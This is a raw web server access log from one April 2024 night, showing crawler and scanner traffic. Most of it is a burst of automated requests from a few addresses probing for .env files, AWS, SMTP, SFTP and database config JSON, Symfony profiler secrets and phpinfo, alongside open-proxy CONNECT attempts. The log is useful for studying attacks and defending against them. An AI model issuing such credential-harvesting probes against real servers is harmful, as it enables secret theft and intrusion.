87.121.69.52 - - [13/Apr/2024:02:36:48 +0200] "CONNECT google.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1"
205.210.31.28 - - [13/Apr/2024:02:45:09 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
216.219.94.195 - - [13/Apr/2024:02:51:03 +0200] "GET /Kvsh/geti.php HTTP/1.1" 404 288 "-" "KvshClient"
146.19.24.28 - - [13/Apr/2024:03:24:45 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
185.150.26.246 - - [13/Apr/2024:04:18:19 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
47.128.26.62 - - [13/Apr/2024:05:08:05 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
139.180.146.78 - - [13/Apr/2024:05:08:26 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.2223.1788 Mobile Safari/537.36"
47.128.110.4 - - [13/Apr/2024:05:08:45 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
159.223.41.7 - - [13/Apr/2024:05:09:07 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.1989.1649 Mobile Safari/537.36"
205.210.31.104 - - [13/Apr/2024:05:24:40 +0200] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
103.203.56.1 - - [13/Apr/2024:05:41:31 +0200] "GET / HTTP/1.1" 200 423 "-" "HTTP Banner Detection (https://security.ipip.net)"
45.79.181.251 - - [13/Apr/2024:06:01:30 +0200] "\x16\x03\x01" 400 383 "-" "-"
117.235.123.165 - - [13/Apr/2024:06:16:46 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
196.196.53.91 - - [13/Apr/2024:06:16:53 +0200] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.1" 404 309 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0"
185.224.128.43 - - [13/Apr/2024:06:43:55 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
146.19.24.28 - - [13/Apr/2024:06:45:14 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
45.79.181.223 - - [13/Apr/2024:06:55:58 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
81.26.142.75 - - [13/Apr/2024:07:06:31 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
80.66.83.49 - - [13/Apr/2024:07:27:06 +0200] "-" 408 - "-" "-"
80.66.83.49 - - [13/Apr/2024:07:27:27 +0200] "-" 408 - "-" "-"
80.66.83.49 - - [13/Apr/2024:07:27:27 +0200] "CONNECT hotmail-com.olc.protection.outlook.com:25 HTTP/1.1" 200 423 "-" "-"
152.42.176.18 - - [13/Apr/2024:07:33:54 +0200] "GET http://httpbin.org/ip HTTP/1.1" 404 278 "-" "Go-http-client/1.1"
83.97.73.245 - - [13/Apr/2024:07:44:17 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.56.117.4 - - [13/Apr/2024:08:03:06 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
193.56.117.3 - - [13/Apr/2024:08:03:12 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
193.56.117.2 - - [13/Apr/2024:08:03:13 +0200] "GET /.DS_Store HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
193.56.117.4 - - [13/Apr/2024:08:03:15 +0200] "GET /.env HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
193.56.117.3 - - [13/Apr/2024:08:03:15 +0200] "POST /.env HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.2 - - [13/Apr/2024:08:03:21 +0200] "GET /.env.old HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
193.56.117.3 - - [13/Apr/2024:08:03:21 +0200] "POST /.env.old HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.3 - - [13/Apr/2024:08:03:22 +0200] "GET /.env.prod HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
193.56.117.4 - - [13/Apr/2024:08:03:22 +0200] "POST /.env.prod HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 10.0; rv:105.0) Gecko/20100101 Firefox/105.0"
193.56.117.4 - - [13/Apr/2024:08:03:23 +0200] "GET /.env.production HTTP/1.1" 404 360 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
193.56.117.4 - - [13/Apr/2024:08:03:23 +0200] "POST /.env.production HTTP/1.1" 404 360 "-" "Mozilla/5.0 (Windows NT 10.0; rv:105.0) Gecko/20100101 Firefox/105.0"
193.56.117.4 - - [13/Apr/2024:08:03:24 +0200] "GET /.env.development%20 HTTP/1.1" 404 362 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.3 - - [13/Apr/2024:08:03:24 +0200] "POST /.env.development%20 HTTP/1.1" 404 362 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0"
193.56.117.2 - - [13/Apr/2024:08:03:25 +0200] "GET /laravel/.env%20 HTTP/1.1" 404 358 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0"
193.56.117.4 - - [13/Apr/2024:08:03:25 +0200] "POST /laravel/.env%20 HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Windows NT 10.0; rv:105.0) Gecko/20100101 Firefox/105.0"
193.56.117.2 - - [13/Apr/2024:08:03:26 +0200] "GET /admin-app/.env%20 HTTP/1.1" 404 360 "-" "Mozilla/5.0 (Windows NT 10.0; rv:105.0) Gecko/20100101 Firefox/105.0"
193.56.117.4 - - [13/Apr/2024:08:03:27 +0200] "POST /admin-app/.env%20 HTTP/1.1" 404 360 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15"
193.56.117.2 - - [13/Apr/2024:08:03:27 +0200] "GET /api/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.4 - - [13/Apr/2024:08:03:28 +0200] "POST /api/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
193.56.117.3 - - [13/Apr/2024:08:03:28 +0200] "GET /app/.env%20 HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
193.56.117.4 - - [13/Apr/2024:08:03:28 +0200] "POST /app/.env%20 HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
193.56.117.4 - - [13/Apr/2024:08:03:29 +0200] "GET /development/.env%20 HTTP/1.1" 404 362 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.3 - - [13/Apr/2024:08:03:29 +0200] "POST /development/.env%20 HTTP/1.1" 404 362 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.2 - - [13/Apr/2024:08:03:30 +0200] "GET /apps/.env%20 HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.4 - - [13/Apr/2024:08:03:31 +0200] "POST /apps/.env%20 HTTP/1.1" 404 355 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.4 - - [13/Apr/2024:08:03:31 +0200] "GET /cp/.env HTTP/1.1" 404 352 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
193.56.117.3 - - [13/Apr/2024:08:03:32 +0200] "POST /cp/.env HTTP/1.1" 404 352 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.3 - - [13/Apr/2024:08:03:32 +0200] "GET /private/.env HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.2 - - [13/Apr/2024:08:03:33 +0200] "POST /private/.env HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
193.56.117.2 - - [13/Apr/2024:08:03:33 +0200] "GET /system/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
193.56.117.2 - - [13/Apr/2024:08:03:34 +0200] "POST /system/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.3 - - [13/Apr/2024:08:03:35 +0200] "GET /redmine/.env HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
193.56.117.4 - - [13/Apr/2024:08:03:35 +0200] "POST /redmine/.env HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.4 - - [13/Apr/2024:08:03:36 +0200] "GET /docker/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.2 - - [13/Apr/2024:08:03:36 +0200] "POST /docker/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0"
193.56.117.4 - - [13/Apr/2024:08:03:37 +0200] "GET /cms/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.3 - - [13/Apr/2024:08:03:37 +0200] "POST /cms/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
193.56.117.2 - - [13/Apr/2024:08:03:38 +0200] "GET /script/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
193.56.117.3 - - [13/Apr/2024:08:03:44 +0200] "GET /live_env%20 HTTP/1.1" 404 354 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0"
193.56.117.3 - - [13/Apr/2024:08:03:44 +0200] "POST /live_env%20 HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.3 - - [13/Apr/2024:08:03:45 +0200] "GET /application/.env HTTP/1.1" 404 361 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
193.56.117.2 - - [13/Apr/2024:08:03:46 +0200] "POST /application/.env HTTP/1.1" 404 361 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
193.56.117.4 - - [13/Apr/2024:08:03:47 +0200] "GET /.env.project%20 HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.3 - - [13/Apr/2024:08:03:47 +0200] "POST /.env.project%20 HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.3 - - [13/Apr/2024:08:03:48 +0200] "GET /.env.dist HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
193.56.117.3 - - [13/Apr/2024:08:03:49 +0200] "POST /.env.dist HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
193.56.117.3 - - [13/Apr/2024:08:03:49 +0200] "GET /back/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.4 - - [13/Apr/2024:08:03:51 +0200] "POST /back/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15"
193.56.117.4 - - [13/Apr/2024:08:03:51 +0200] "GET /core/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.3 - - [13/Apr/2024:08:03:52 +0200] "POST /core/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
193.56.117.2 - - [13/Apr/2024:08:04:02 +0200] "GET /__tests__/test-become/.env HTTP/1.1" 404 371 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15"
193.56.117.3 - - [13/Apr/2024:08:04:03 +0200] "POST /__tests__/test-become/.env HTTP/1.1" 404 371 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0"
193.56.117.2 - - [13/Apr/2024:08:04:03 +0200] "GET /local/.env HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.3 - - [13/Apr/2024:08:04:09 +0200] "GET /rest/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.4 - - [13/Apr/2024:08:04:10 +0200] "POST /rest/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
193.56.117.4 - - [13/Apr/2024:08:04:10 +0200] "GET /shared/.env%20 HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.4 - - [13/Apr/2024:08:04:11 +0200] "POST /shared/.env%20 HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
193.56.117.3 - - [13/Apr/2024:08:04:11 +0200] "GET /sources/.env HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
193.56.117.2 - - [13/Apr/2024:08:04:12 +0200] "POST /sources/.env HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
193.56.117.4 - - [13/Apr/2024:08:04:12 +0200] "GET /enviroments/.env.production HTTP/1.1" 404 372 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.3 - - [13/Apr/2024:08:04:13 +0200] "POST /enviroments/.env.production HTTP/1.1" 404 372 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.3 - - [13/Apr/2024:08:04:13 +0200] "GET /enviroments/.env HTTP/1.1" 404 361 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:105.0) Gecko/20100101 Firefox/105.0"
193.56.117.4 - - [13/Apr/2024:08:04:14 +0200] "POST /enviroments/.env HTTP/1.1" 404 361 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.3 - - [13/Apr/2024:08:04:14 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.2 - - [13/Apr/2024:08:04:15 +0200] "POST / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.2 - - [13/Apr/2024:08:04:16 +0200] "GET /debug/default/view?panel=config HTTP/1.1" 404 363 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0"
193.56.117.4 - - [13/Apr/2024:08:04:16 +0200] "GET /debug/default/view.html HTTP/1.1" 404 368 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0"
193.56.117.4 - - [13/Apr/2024:08:04:17 +0200] "GET /debug/default/view HTTP/1.1" 404 363 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15"
193.56.117.2 - - [13/Apr/2024:08:04:17 +0200] "GET /frontend/web/debug/default/view HTTP/1.1" 404 376 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.4 - - [13/Apr/2024:08:04:18 +0200] "GET /web/debug/default/view HTTP/1.1" 404 367 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.3 - - [13/Apr/2024:08:04:18 +0200] "GET /sapi/debug/default/view HTTP/1.1" 404 368 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
193.56.117.4 - - [13/Apr/2024:08:04:19 +0200] "GET /config.json HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.3 - - [13/Apr/2024:08:04:19 +0200] "GET /AwsConfig.json HTTP/1.1" 404 359 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
193.56.117.4 - - [13/Apr/2024:08:04:20 +0200] "GET /awsconfig.json HTTP/1.1" 404 359 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
193.56.117.4 - - [13/Apr/2024:08:04:26 +0200] "GET /conf.json HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.4 - - [13/Apr/2024:08:04:26 +0200] "GET /env.json HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
193.56.117.2 - - [13/Apr/2024:08:04:26 +0200] "GET /.vscode/sftp.json HTTP/1.1" 404 362 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
193.56.117.2 - - [13/Apr/2024:08:04:27 +0200] "GET /.json HTTP/1.1" 404 350 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
193.56.117.2 - - [13/Apr/2024:08:04:27 +0200] "GET /smtp.json HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.2 - - [13/Apr/2024:08:04:28 +0200] "GET /db.json HTTP/1.1" 404 352 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
193.56.117.3 - - [13/Apr/2024:08:04:28 +0200] "GET /sendgrid.json HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.2 - - [13/Apr/2024:08:04:29 +0200] "GET /ws-config.json HTTP/1.1" 404 359 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.3 - - [13/Apr/2024:08:04:29 +0200] "GET /_wpeprivate/config.json HTTP/1.1" 404 368 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0"
193.56.117.4 - - [13/Apr/2024:08:04:30 +0200] "GET /deployment-config.json HTTP/1.1" 404 367 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
193.56.117.3 - - [13/Apr/2024:08:04:31 +0200] "GET /sftp-config.json HTTP/1.1" 404 361 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
193.56.117.4 - - [13/Apr/2024:08:04:31 +0200] "GET /db/robomongo.json HTTP/1.1" 404 362 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.4 - - [13/Apr/2024:08:04:32 +0200] "GET /robomongo.json HTTP/1.1" 404 359 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
193.56.117.4 - - [13/Apr/2024:08:04:33 +0200] "GET /client_secrets.json HTTP/1.1" 404 364 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
193.56.117.3 - - [13/Apr/2024:08:04:33 +0200] "GET /user-config.json HTTP/1.1" 404 361 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.3 - - [13/Apr/2024:08:04:37 +0200] "GET /ssh-config.json HTTP/1.1" 404 360 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
193.56.117.3 - - [13/Apr/2024:08:04:37 +0200] "GET /database-config.json HTTP/1.1" 404 365 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.2 - - [13/Apr/2024:08:04:44 +0200] "GET /config/config.json HTTP/1.1" 404 363 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.3 - - [13/Apr/2024:08:04:45 +0200] "GET /credentials/config.json HTTP/1.1" 404 368 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0"
193.56.117.4 - - [13/Apr/2024:08:04:46 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.2 - - [13/Apr/2024:08:04:47 +0200] "GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.1" 404 371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
193.56.117.2 - - [13/Apr/2024:08:04:47 +0200] "GET /_profiler/open?file=app/config/parameters.yml HTTP/1.1" 404 359 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0"
193.56.117.3 - - [13/Apr/2024:08:04:49 +0200] "GET /app/config/parameters.yml HTTP/1.1" 404 370 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.2 - - [13/Apr/2024:08:04:50 +0200] "GET /config/parameters.yml HTTP/1.1" 404 366 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
193.56.117.2 - - [13/Apr/2024:08:04:55 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 362 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.2 - - [13/Apr/2024:08:04:56 +0200] "GET /app_dev.php/_profiler/phpinfo HTTP/1.1" 404 374 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.56.117.4 - - [13/Apr/2024:08:04:58 +0200] "GET /phpinfo.php HTTP/1.1" 200 63378 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
193.56.117.2 - - [13/Apr/2024:08:05:00 +0200] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 404 380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
